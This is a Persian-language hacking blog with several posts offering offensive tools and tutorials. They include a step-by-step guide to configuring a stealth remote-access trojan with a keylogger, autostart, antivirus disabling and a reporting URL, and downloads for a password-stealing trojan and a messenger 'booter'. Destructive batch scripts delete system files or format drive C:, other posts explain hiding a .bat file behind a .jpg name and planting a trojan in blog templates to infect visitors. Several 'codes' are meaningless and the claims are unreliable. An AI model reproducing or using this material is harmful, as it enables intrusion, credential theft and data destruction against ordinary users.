تبليغاتX
جوربا جور
.روبات یاهو را اد کنید   robat_freesender   

۲.این پیغام را واسه روبات یاهو بفرستید تا پسوردی رو که میخواهید

 واستون بفرسته

۳.این مطالب را به ترتیب بنویسید و بعد واسه یاهو بفرستید تا پسورد را

بهتون بعد از ۱ روز بدهد

خط اول (ایمیل خودتون*پسوردتون)به همین شکل داخل پرانتز بنوسید

 
خط دوم(ایمیل کسی که میخواهید هکش کنید)به همین شکل داخل پرانتز بنوسید


خط سوم این نوشته را همین جوری کپی میکنید

*****___Hotmailpswd_rtrvl_Xtra-----fast-----server(victimpswd)----Snd---bk---anypswd(crack---rtrvl%^&%^&%^&"£""!_______SND_____Free----4635---Yahoo--Aol---Hotmail____(robat_freesender@yahoo.com)
Email----Cracker%^&&^&^*((

تمام همین حالا اینو واسه این ایمیل که ایمیل پسورد یاب یاهوست بفرستید این فرمان باعث میشه

 روبات هنگ کرده و هر چه را که شما میخواهید واستون بفرسته

 بچه ها من این را در یه سایتی دیدم می خواستم به شما بگم که این ها همش دروغه و طرف با

این کار ایدی پسورد شما را در میاره.

 گول این حرفا را نخورید .

موفق باشید بای.

 

نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1386/03/02 ساعت 19:59 | لینک ثابت |

سلام

اين نرم افزاربراي كنترل يك سيستم از راه دور هست!!!!! من فقط براي ندا گزاشتمش !!! حالا اگه مخواين شما هم استفاده كنين .!!!! برای شروع ابتدا این تروجان را از اینجا دانلود کنید.

بعد از دانلود برنامه را از حالت فشرده خارج کنید و سپس در پوشه برنامه فایل CreateServer.exe را اجرا کنید. سپس با توجه به راهنمایی های زیر تنطیمات مورد نظر خود را اعمال کنید.

 

ابتدا قسمت I Want to create a stealth Trojan server for a victim را انتخاب کنید.

 

۱.  این قسمت برای سیستم های است که از ویندوز 98 و 95 استفاده میکنند و VB6 runtimes روی آن ها نصب نشده.

۲. این

۳. این گزینه سروری با حجم کم و امکانات محدود برای شما ایجاد میکند.

۴. این

۵. با انتخاب این گزینه بعد از ساخته شدن سرور پنجره تنطیمات به طور اتوماتیک باز می شود.

۶. این دو قسمت فعلا به درد ما نمی خوره. اولی برای تست کردن سیستم با این تروجان و دومی برای ویرایش سروی است که قبلا ساختید.

برای ادامه باید دکمه OK را بزنید. صفحه زیر ظاهر می شود.

 

 

۱. در این قسمت شما باید نامی برای سرورتون وارد کنید.

تذکر: گزینه های 2 تا 6 پسوند های است که می تونین برای سرورتون انتخاب کنید.

۲. پسوند مخصوص اسکیرین سیور ها.

۳. پسوند مخصوص بچ فایل ها.

۴. پسوند مخصوص برنامه های داس.

۵. پسوند مخصوص برنامه های داس.

۶. پسوند برنامه ها.

برای ادامه و ذخیره شدن سرور بروی دکمه Save کلیک کنید.

حالا پنجره تنظیمات باز می شود.

 

 

 

 

۱. در این قسمت باید یک پورت بغیر از پورت 1024 را انتخاب کنید.

۲. با انتخاب این گزینه سرور شما با نام های مختلف زخیره می شود.

۳. در اینجا می تونین یک آیکون برای سرور فعال شده در سیستم قربانی تعیین کنید.

۴. در اینجا می تونین برای قربانی(ها) خودتون یک اسم انتخاب کنید.

۵. با استفاده از هر کدام از این دکمه ها وارد قسمتی میشین و می تونین تنطیمات مختلفی از جمله ( گزاشتن پسدرد و تنطیم استارت آپ و...) را روی سزور انجام بدین.

حالا یک بار بر روی Password کلیک کنید.

 

 ۱. اگر این قسمت را فعال کنید وپسورد را وارد کنید هنگام وصل شدن به سرور این پسورد از شما پرسیده می شود.

۲. اگر این قسمت را انتخاب و سپس پسورد را وارد کنید برای ویرایش مجدد سرور از شما پسورد خواسته می شود.

۳. با انتتخاب این گزینه پس از وصل شدن به سرور اختیار کامل خواهید داشت.

۴. برای وقتیه که شما می خواهید این سرور را به افراد دیگر نیز بدین در اینکا شما می تونین سطح دسترس اون ها را مشخص کنید.

 

حالا بر روی دکمه Autostart کلیک کنید.

 

 

۱. با انتخاب این گزینه اگر قربانی سرور شما رو پیدا کنه و پاک کنه سیستم دوباره اون را باز یابی میکنه.

۲. این قسمت نحوه فعال شدن سرور بهع هنگام خاموش وروشن شدن کامپوتر را نشون میده.

۳. با انتخاب این گزینه سرور خودش نحوه فعال شدنش را انتخاب می کند.

بر روی دکمه Notification 1 کلیک کنید.

 

۱. با انتخاب این گزینه و وارد کردن شماره ICQ مسنجرتان و انتخاب دکمه Configure مشخصات قربانی از این طریق برای شما فرستاده می شود.

1)از طریق این ID مشخصات برای شما فرستاده می شود.

2)پیغام با این مو ضوع به دست شما می رسد.

3)در اینجا تیملل ر وارد می کنید.

4)در اینجا اطلاعاتی که برای شما فرستاده می شود مشخص می کنید.

۲. شما برای استفاده از این قسمت به دو ایمیل در هاتمیل نیاز دارید. ابتدا باید در این قسمت ایمیل اولتون را همراه با پسوردش وارد کنید.(برای استفاده از این قسمت باید از مسنجر مایکروسافت استفاده کنید. چون هیچ هیمیلی به شما فرستاده نمیشود.)

۳. در این قسمت باید ایمیل دوم خودتون رادر هاتمیل وارد کنید.

۴. در اینجا اطلاعاتی که برای شما فرستاده می شود مشخص می کنید.

دکمه Notification 2 را کلیک کنید.

 

 

۱. در این قسمت باید آدرس زیر را وارد کنید.

http://mozahem.netfirms.com/cgi-bin/put.cgi

و در این صورت هرگاه قربانی شما به اینترنت متصل شود میتونید مشخصات اون را در این صفحه ببینین.

۲. در این قسمت می تونید مشهصاتی که مایلید ببینید انتخاب کنید.

بر روی دکمه Options کلیک کنید.

 

تغییر الدازه سرور بعد از فعال شدن.

بر روی Events کلیک کنید.

 

 

۱. انتخاب

دکمه Bind Files را انتخاب کنید

 

۱. این قسمت برای اضافه کردن فایل های .dll و یا .ocx است که برای اجرای بعضی Plugin ها احتیاج است.

۲. در این قسمت شما می تونین هر فایلی که می خواهین قبل از سرور اجرا بشه اضافه کنید.

۳. در اینجا هر برنامه ای که می خواهید همراه سرور اجرا بشود اضافه می کنید.

برای رفتن به قسمت Keylgger بر روی آن کلیک کنید.

 

 

 

 

 

۱. با انتخاب این گزینه هر کلیدی که قربانی بزند در فایلی ذخیره می شود.

۲. در اینجا نام فایل را انتخاب می کنید.

۳. با انتخاب این گزینه برنامه فقط هنگامی که کلمات خاصی در صفحه باشد شروع به ثبت می کند.

۴. در اینجا کلماتی که در قسمت قبل گفته شد وارد می کنید.

بر روی Plug-ins/Kill کلیک کنید.

 

 

۱. در این قسمت می تونید Plugin های مورد نظرتون را به سرور اضافه کنید.

۲. با استفاده از این قسمت می تونید قبل از فعال شدن سرور بعضی قسمت ها مثل سیستم گارد آنتی ویروس ها را از کار بندازین.

برای رفتن به قسمت Fake Errorبر روی آن کلیک کنید.

 

 

 

۱. با انتخاب این گزینه بعد از اجرا شدن سرور یک پیغام خطا برای قربانی فرستاده می شود.

۲. در اینجا می تونید آیکن پیغام را مشخص کنید.

۳. در این محل متنی که می خواهید در نوار عنوان پیغام نشان داده شود وارد می کنید.

۴. در اینجا متن پیام را مشخص می کنید.( بازدن دکمه Test می تونید پیغام خودتون را ببینین)

برای رفتن به قسمت File Properties بر روی آن کلیک کنید.

 

۱. با استفاده از این قسمت شما می تونید مشخصات یک برنامه را در فایل خود وارد کنید.

برای رفتن به قسمت Icone ها برروی آن کلیک کنید.

۱. با انتخاب این قسمت می تونید از آرشیو آیکن برنامه استفاده کنید.

۲. با انتخاب این قسمت می تونین آیکن مود نظر خودتون را از روی هارد پیدا کنید.

۳. با استفاده از این قسمت می تونید مسیر آیکن مورد نظرتون را وارد کنید.

 

حالا با استفاده از دکمه Save سروز خود را زخیره کنید.

 

 

و اما پیشنهادات من...:

 

سرورتون را با پسوند .scr ذخیره کنید.

اسم قربانیتون را به A Vic تغییر بدید.

پورت 4288 را وارد کنید.

تمام گزینه های قسمت Autostart را فعال کنید.

قسمت های MSN Notify و ICQ-Notify را فعال و آدرس ذکر شده را در قسمت CGI وارد کنید.

بحش های 1 و 2 و 4 و 5 و 7 و 8 و 9 را درقسمت Options فعال کنید.

قسمت Keylogger را فعال کنید.

قسمت Fake Error را فعال کنید.

برای سرورتون یک آیکن انتخاب کنید.

نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1386/03/02 ساعت 19:38 | لینک ثابت |

سلام  از نظرات زیبایی که میدید واقعا ممنونم

امروز برای شما یک برنامه میزارم که با اون میتونید اد لیست هایی که توی یاهو مسنجر دارید

اذیتشون کنید روی اعصابشون  راه میرید ایدیه شما برای دوست ادلیستتون روشن و خاموش میشه

آموزشم نداره خیلی کار باهاش سادست وقتی که ایدیتونو باز کردین نرم افزارم باز کنید بعد تعداد

 دفعاتی که میخواین ایدیتون روشن وخاموش بشه رو توی کادر کوچکی که جلوی number of  off- on status bomb بزنید

بعدم دکمهon-oof bomb بزنید بعدم نگاه کنید

برنامه رو از اینجا دانلود کنید

نظر یادت نره عزیز

 نوع مطلب : هک

نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1386/02/26 ساعت 19:49 | لینک ثابت |
درود بر شما:

من این نابودگر( بوتر )را تقدیم می کنم به  دوست خوبم جناب اقای ساسان نوبختiroweb

U-G-P-Hardcore-4-Life-v2 یک نابودگر  فوق خفن برای اخرین ورژن یاهو مسنجر(۸.۱ ) با چند کارایی خارق العاده مانند انلاین  و افلاین چک دو نفر بطور همزمان-ایدی لاکر(قفل کردن ایدی)-بوت همزمان دو ایدی با اپشنهای قوی-من خودم امروز این بوتر را فقط با ۱۰ ایدی برای روی خودم امتحان کردم فقط میتونم بگم خدا به داد کسی برسه که با این بوتر بوت میشه...........  


خلاصه کار ایی های این نابودگر
۱-بوت کردن اخرین ورژن یاهو مسنجر و  قویرترین انتی بوترها
۲-قفل کردن ایدی دیگران به مدت طولانی 
۳-ان لاین و اف لاین چک دو نفر بطور همزمان
۴-بوت کردن  دو نفر بصورت همزمان در ۲ ثانیه
۵-مشاهده پروفایل دو نفر بصورت همزمان
۶-چند اپشن برای بوت کردن قربانی
۷-فرستادن پبام شما به رومها (تبلیغات در رومها)
۸-و............

 برای دیدن عکس بزرگتر روی ان کلیک کنید

برای دیدن عکس بزرگتر روی ان کلیک کنید

هر بدبختی که با این بوتر توسط شما بوت شود هر زمان که با یاهو مسنجرش ان شود خاطره بوت شدنش را از یاد نخواهد برد

 

دانلود کن با حجم 500کیلو بایت

نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1386/02/26 ساعت 19:37 | لینک ثابت |
تروجان جدید اقا پیمان برای برای هک  کردن پسورد یاهو مسنجر ۸ و ۸.۱ که اخرین ورژن از انتی ویروسهای اپدیت شده قادر به شناساییسرور ان نیستند

مزیتهای این تروجان

غیر قابل شناسایی توسط هیچ انتی ویروسی(۸۶.۲.۲۱)
فرستادن پسورد اخرین ورژن یاهو مسنجر(۸و ۸.۱) بصورتpm
فرستادن مشخصات کانکشن قربانی
ارسال ساعت و تاریخ وصل شده قربانی به اینترنت

                                                     

من خودم این تروجان را با اخرین ورژن ار انتی ویروسهای اپدیت شده اسکن کردم که هیچ کدوم انرا شناسایی نکردند.

دانلود کن با حجم 650کیلو بایت

اموزش تصویری به همراه لینک دیگر برای دانلود در ادامه مطلب................


ادامه مطلب
نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1386/02/26 ساعت 19:35 | لینک ثابت |
 

علائم ویروسی شدن

   

گدر صورتی که رایانه تان ویروسی شده باشد حداقل یکی از موارد زیر در سیستم شما دیده می شود :

 

1 – homepage مرور گر اینترنت شما عوض می شود . بدون آنکه خودتان آن را تغییر داده باشید .

 

2 – بدون اینکه شما متوجه شوید یک Toolbar جدید برایتان نصب می شود .

 

3 – فایروال سیستم ( اگر فایروال داشته باشید ) به شما هشدار می دهد که یک برنامه جدید در سیستم تلاش می کند به اینترنت متصل شود .

 

4 – shortcut جدید روی desktop ظاهر می شود بدون اینکه شما آنرا ایجاد کرده باشید .

 

5 – به منوی Favorite مرور گرتان یک Link جدید اضافه می شود .

 

6 – سیستم بدون دلیل خاصی کند می شود .

 

7 – عملکرد CPU بطور غیر طبیعی افزایش پیدا می کند .

 

8 – POP-UP های تبلیغاتی به شکل پنجره های کوچکی باز می شوند و به هیچ وجه نمی توان آنها رابست .

 

9 – هر زمان که search می کنید علاوه بر صفحات مورد نظرتان صفحات نا مر بوط دیگر هم برایتان باز می شود .

 

10 –دسترسی به اینترنت شما قطع می شود .

 

11 – در قسمت add/removeprogramدر controlpanel برنامه های نا خواسته ای نصب می شود .

 

12 – فعالیت فایر وال یا آنتی ویروس سیستم به طور ناگهانی مختا می شود .

 

نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1386/02/26 ساعت 19:31 | لینک ثابت |
این ویروس ها بر روی هر کامپیوتری که آن را اجرا کند عمل میکند و دوست و غریبه هم نمی شناسد در مورد تبدیل ویروس به فایل دیگر هم برنامه هایی وجود دارد که یک ویروس میسازد و به فایل عکس تبدیل میکند یک ترفند کوچک برای مخفی کردن پسوند bat. ویروس ها این است که در قسمتی که اسم ویروس را مینویسید اسم مورد نظر را نوشته و به آن پسوند jpg. و بعد از آن 25 بار اسپیس را زده و به آن پسوند bat. بدهید مثل
virus.jpg ... .bat که (...) نشانه ی 25 اسپیس هست ((نظر هم بدهید))

---------------------------------------------------------------------------------------------------------------

به قسمت start بروید و allprpgrams را انتخواب کنید accessories رفته و در گزینه ها notepad را انتخواب کنید ((نظر هم بدید))


لطفا در صورت استفاده از آموزش های وبلاگ نظر خود را بنویسید و اگر سوالی دارید در قسمت نظرات بنویسید و هر چیزی را که میخواهید بگویید تا بگذارم


سوختن مادر بورد

آموزش ساخت ویروس : این ویروس در صورت اجرا کامپیوتر فرد را به کلی خراب میکند طرز ساخت: note pad خود را باز کرده و کد پاین

 


@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========
رادر آن کپی و پست کنید بعد به منوی فایل رفته وسیو از را انتخواب کنید ودر قسمت filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل xxx.bat توجه (( خط فاصله ها هم جزو کد هستند ))



سوختن cpu

آموزش ساخت ویروس : طرز ساخت: note pad خود را باز کنید سپس کد cpu_567hjkblaster را در آن کپی و پست کنید از منوی فایل سیو از را انتخواب کنید و در filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل cpu.bat


سوزاندن هارد

 آموزش ساخت ویروس : طرز ساخت : note pad خود را باز کرده و کد debug e30 o31 را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat و آن را ذخیره کنید


سرعت بالا آمادن ویندوز خود را زیاد کنید

راستش یه فولدری رو تو پوشه ویندوز پیدا کردم که اگر محتویات داخل آن را پاک کنید ویندوز زودتر بالا می آید
این هم مسیر پوشه:به فرض اگه ویندوز تو درایو c باشه
C:\WINDOWS\Prefetch
هه شو پاک کنید


ویروس فیلتر گزار

 آموزش ساخت ویروس : توضیح درباره ویروس : این ویروس در internet explore فیلتر گذاری میکنه و باعث از کار انداختن اون میشه و دیگه نمیشه به هیچ سایتی رفت . طرز ساخت : note pad خود را باز کرده و کدی را که نوشته شده است pouped-blocked-web-exploure-online&offline را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر خود را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat بعد هم فایل را ذخیره کنید


ریست کردن کامپیوتر

 آموزش ساخت ویروس : ابتدا Notepad ویندوز را باز کنيد. سپس اين عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس به منوی فایل رفته و سیو از را انتخواب کنید ودر قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat


فرمت درایو

آموزش ساخت ویروس : ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:

 


@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
حال از منوی File بر روی Save as کلیک کنید.
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال thebesthacker.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.


 


بوت کردن در یاهو ۷ بدون برنامه

یاهو مسنجر را باز کنید در گزینه های بالا روی im کلیک کنید بعد از باز شدن به پوشه ی دوم بروید و id مورد نظر را نوشته و بعد از آن دوتا ++بزنید مثل ++thebesthacker بعد ok کنید بعدصفحه ای باز میشود مانند صفحه ی چت بعد 10 تا L در این صفحه و 10 L در صفحه ای که با فردی که id آن بدون ++ نوشته اید و در حال چت هستید بروید و10 L در آنجا نوشته و بفرستید این کار باید 4 یا 5 بار تکرار شود نکته:برای نوشتن 10 L هر L را جدا گانه بنویسید (( L بعد اینتر _ L بعد اینتر و...)) بعد از این کار 50_60 صفحه در کامپیوتر فرد باز میشود و فرد دیسکانکت میشود توجه داشته باشید که یاهو شما و فرد مقابل باید 7 باشد


ویروس بلستر

آموزش ساخت ویروس : این ویروس در صورت اجرا شدن کامپیوتر فرد را restart میکند طرز ساختن ویروس: note pad را باز کرده و کد shutdown -a را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل blester.bat


پرکردن هارد

آموزش ساخت ویروس : این ویروس هارد را پر میکند و دیگر هیچ بازی و برنامه ای نصب نمیشود طرز ساخت ویروس: note pad خود را باز کرده و کد c/windows/system32/jefo/display/memory/full را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید و در قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل memory.bat بعد ذخیره کنید


آموزش ساخت ویروس : این ویروس بعد از نصب بر ریجستر اثر میگذارد و باعث میشود با فشار دادن هر دکمه ای از کیبورد کیس 2 صدای بوق بدهد و مانیتور چشمک بزند طرز ساخت: note pad خود را باز کرده و در آن کد

 


Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنید
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"



نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1385/10/20 ساعت 11:19 | لینک ثابت |
موضوع:

اینم JPS 1.6 که Double Sender شده یعنی هم به میل میفرسته هم به آیدی + 2-3 تا چیز دیگه

امکانات:

۱-ارسال پسورد های یاهو مسنجر به آیدی

2-ارسال پسوردهای Dialup

3-ارسال IP

4-ارسال Computer Name

5-ارسال Win User

6-ارسال Os Name

7-غیر فعال کردن Task Manager

8-غیر فعال کردن MsConfig

9-غیر فعال کردن رجیستری

10-Delete Yahoo Message Archive

11-Disable Y! Save Password

12-غیر فعال کردن آنتی ویروس نورتون

13-غیر فعال کردن آنتی ویروس مک آفی

14-از کار انداختن فایروال ویندوز

15-اجرای خودکار

16-نمایش پیغام جعلی برای قربانی

17-انتخاب آیکون پیش فرض و دلخواه برای سرور

18-(Supported On Yahoo (5x,6x,7x

19-غیر فعال کردن Gpedit

20-مخفی کردن و قفل کردن تمامی درایو ها

21-پاک کردن پسورد بایوس و ایجاد حالت default در Cmos

22-اتصال به کامپیوتر قربانی از راه دور

۲۳-از کار انداختن ویندوز

۲۴-قفل کردن ماوس و کیبرد

۲۵-قفل کردن سیستم

تنظیمات بعد از ۳۰ ثانیه:

۲۶-باز و بسته کردن Cd Rom

27-جا به جا کردن نشانگر ماوس

28-قفل کردن TaskBar

29-غیر فعال کردن TaskBar

30-مخفی کردن گزینه Run در منوی Start

31-مخفی کردن دکمه Start در ویندوز

32-قفل کردن TaskBar

33-قفل کردن راست کلیک

34-مخفی کردن گزینه ShutDown در منوی Start

و ...

35-مخفی شدن در لیست Process (انتخابی)

36-خاموش کردن مانیتور قربانی بعد از ۳۰ ثانیه

37-سازگاری با یاهو کرک شده

۳۸-عدم شناسایی توسط آنتی ویروس حتی آنتی ویروس هایی نظیر Nod32,Norton

۳۹-ارسال کلیه پسوردهای ذخیره شده اینترنتی

40-ارسال پسورد های ذخیره شده میل

(Gmail-Hotmail-Yahoo-Mozilla-Netscape Saved Password) و Outlook

41-ارسال پسوردهای ذخیره شده مسنجرها

(MSN-Netscape-Trillian-Miranda-AOL-GAIM Saved Password )

42-ارسال به میل

43-از کار انداختن تروجان IE-Ps

44-از کار انداختن آنتی ویروس Kasper



دانلود اين برنامه ي خفن

 

موضوع:

سبلم اقايون و خانوم هاي محترم امروز يا بهتره بگم امشب مب خوام براي شما اموزش كد هاي هك رو بزارم كه مايل بوديد . فقط اميد وارم جنبه ي اين اموزش رو داشته باشيد !

اين كار چند تا خوبي و چند تا بدي داره اول خوبي ها رو بگم يا بدي ها رو ؟

 

o        اين كد باعث ميشه كه وبلاگ شما دير بارگذاري بشه

o        اين باعث ميشه كه هر كي وارد وبلاگ شما بشه هك بشه

ساختن اين كد براي هر فرد بايد به صورت جدا گونه باشه در ادامه شما متوجه ميشيد كه چرا من اين كد رو به صورت اماده در اختيار شما نگذاشتم .

وسايل مورد نياز براي يك حال گيري حسابي

o        يك تروجان كم حجم كه من مجيك رو به شما پيشنهاد ميكنم

o        احتياج به برنامه ي EXE to txt

o        قرار دادن txt در قالب يك اسكريپت

تروجان مجيك رو كه فكر مي كنم بايد همه ي شما داشته باشيد اگه نداريد تازه كار هستيد بريد دنبال يك كار ديگه امه برنامه ي exe to txt رو از كجا پيدا كنيد بريد .

دانلود كنيد برنامه ي exe to txt

خب فرض ميكنيم كه شما اين برنامه رو دانلود كرديد حالا تو برنامه فايل ترو جان خودتون رو كه ساخته بوديد رو add كنيد وقتي اين كار رو كرديد دكمه ي كانورت رو بزنيد به شما يك تعداد زيادي كد ميده اين كد ها در حالت عادي مفت نمي ارزه بايد اون رو درون يك اسكريپت بزاريد تا كار بده وقتي اين كار رو كرديد اون رو تو ويرايش قالب خودتون بزاريد اول قالب بزاريد بهتره . اگه مي خواهيد مطمعا بشيد كه كد رو درست درون اسكريپت گذاشتيد يك بار اون رو توي يك صفحهي معمولي وب بزاريد اگه درست گذاشته باشيد كد ها رو مشاهده نمي كنيد در غير اين صورت  اشتباه كرديد . چه ميدونيد شايد شما الان در اختيار من باشيد ! شايد من الان دارم صفحه ي مانيتور شما رو چك ميكنم ! نترسيد من كاري به شما ندارم !!!!!!!

خب اين هم از اموزش اميد وارم موفق باشيد

 

موضوع:

 سلام دوستان من باز اومدم. دلت مي خواد دستكم روزي 40 تا وبلاگ هك كني ؟

بعضي ها واقعا هنوز هم تو كف هك كردن يك وبلاگ موندن و ميان براي من وبلاگ اموزش هك ميزارن . اشكالي نداره من امروز به شما روشي رو ياد ميدم كه بتونيد با اون روزانه حداقل 50 تا وبلاگ رو هك كنيد. البته اين اموزش كمي هم جنبه لازم داره !!!!!

براي اينكه با اين كار بهتر اشنا بشيد من براي شما به طور ساده توضيح ميدم كه فردا نيايي كامنت بزاري هي بگي بيشتر توضيح بده .ببيند وقتي شما وارد همين سايت بلاگفاي خودمون مي شيد و مي خواهيد وارد سايت خودتون بشيد ميريد و يوزر و پسورد خودتون رو ميديد تا وارد بشيد . خب بلاخره اين يوزر ها كجا ميرن ؟ اين يوزر توسط پكت هايي از طريق پورت خاصي وارد عبور ميكنند .

ايا نميشه به اين پورت گوش بديم ؟ بله ميشه .

با چه ابزاري ؟ با ابزاري به نام اسنيفر ها (البته نه هر اسنيفري ، به قول بچه هكرها قابليت packet sniffer  باشه يعني توانايي گوش دادن به پورت و كش روفتن پكت ها رو داشته باشه . اقلب وقتي شما به پكت هاي مورد نظر خودتون رسيديد به صورت كد بندي شده هست و شما هيچي نوفهميد ! اين كاري نداره برنامه هاي زيادي وجود دارند كه ميتونند اين كدها رو بخونند و يوزر و پس رو به شما بدند .

خب الان خيلي سريع و به صورت خلاصه وار باز هم توضيح ميدم.

  1. پيدا كردن اي پي سايت بلاگفا يا پرشن بلاگ يا ميهن بلاگ
  2. دادن اي پي به اسنيفر
  3. حالا اسنيفر بلا نسبت مثل سگ اين پكت هاي رد و بدل شده رو بو ميكشه و به شما ميده
  4. پكت ها رو كه به شما داد شما اين پكت ها رو رمز شكني ميكنيد
  5. شما وفق شديد

حال كردي توي پنج تا مرحله قشنگ و خوشكل براتون توضيح دادم . حالا بگيد hackdoost  خلي بده . براي اينكه فكر كردم بعضي ها بلد نيستد ip سايت ها بالا رو پيدا كنند بهتون ميدم البته هيچ كاري نداره برو start>run>cmd>ping blogf.com                      

بلاگفا : 38.113.162.27

ميهن بلاگ : 204.15.78.51

پرشن بلاگ : 70.85.27.85

راستي داشت يادم ميرفت با خمين ping   كردن مي تونيد سرعت اتصل به اينترنت تون رو افزايش بديد به اين صورت كه شما چند با به سرورتون كه به شما اكانت داده پينگ كنيد كامپيوتر هاي سرور براي مدت خيلي كمي هنگ ميكني همين كافيه تا افراد ديگه رو كه از اون سرور اكانت گرفتن و انلاين هستند ديسكانگت بشن و شما تك و تنها با سرعت بيشر براي خودتون حال كنيد !!! شيطوني نكني ها!!!

خب بريم سراغ اسنيفر ها :

ايني كه ميخوام به شما مفرفي كنم رد خور نداره اصل حاله يك چيزي ميگم يك چيزي ميشنوي !!

اسم اين اسنيفر هستش My IP Suite اين برنامه رو براي هك ساختن ورژن 6 هست تازه ي تازه ي اومده . با اين برنامه مي تونيد ip خوتون رو عوض كنيد يا به عبارت دكير مي تونيد هويت خودتون رو مخفي كنيد . مي تونيد از ابزار هاي پينگ كردن و مكان يابي ماهواره اي استفاده كنبد . ميتونيد سايت رو اسكن كنيد . ميتونيد عمل whois رو انجام بديد . فقط فقط يك مشكل داره تا 15 روز ميتونيد از اون مجاني استفاده كنيد . براي همين بايد كركش كرد من هم دارم رو كركش كار ميكنم اما هنوز به موفقيتي نرسيدم اگه هر كدوم از شما كركش كرديد به من هم بگه با اين كار حداقل يك بار هم به من كمك كنيد .

.:: ادرس برنامه ::. My IP Suite v6  .:: حجم ::. 1.3 MB ::.

يك اسنيفر ديگه اين هم بد نيست حجمش هم خيلي كمه

ادرس : دانلود كنيد اسنيفر

 اميد وارم موفق باشيد

سلام دوستان امروز به شما يك برنامه معرفي ميكنم كه end حاله .
با اين برنامه مي تونيد حجم تروجان هاي خودتون رو تا 70% كاهش بديد و اون رو براي دوستان خودتون بفرستيد . نه اينكه يك تروجان كه حجمش 30 كيلوبايته رو برداريد بفرستيد ، اخه همه كه خر نيستند . با اين برنامه ميتونيد تروجاني كه حجمش 30 كيلو بايته رو بكنيد 9 كيلو بايت يا 12 كيلو بايتي رو بكنيد 3.6 كيلو بايت خيلي با حاله مگه نه ؟
حجم اين برنامه 558 كيلو بايته و سريع دانلود ميشه . در ضمن كركش رو هم داخلش گذاشتم كه بري حالت رو بكني .
دانلود كنيد برنامه ي ASPack دهنده ي حجم ترو جان رو

 

موضوع:

سلام امروز ميخوام برنامه اي رو نشون بدم كه به راحتي بتونيد با اون سايت هاي كه با پرتال هاي زير نوشته مشوند رو به راحتي ديفيس كنيد.
فرض ميكنيم يك سايتي رو با web check اسكن كرديم :
HTTP/1.0 404 Not Found
Date: Wed, 19 Jul 2006 10:55:36 GMT
Connection: close
X-Cache: MISS from parto-server2.varzaneh.com
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
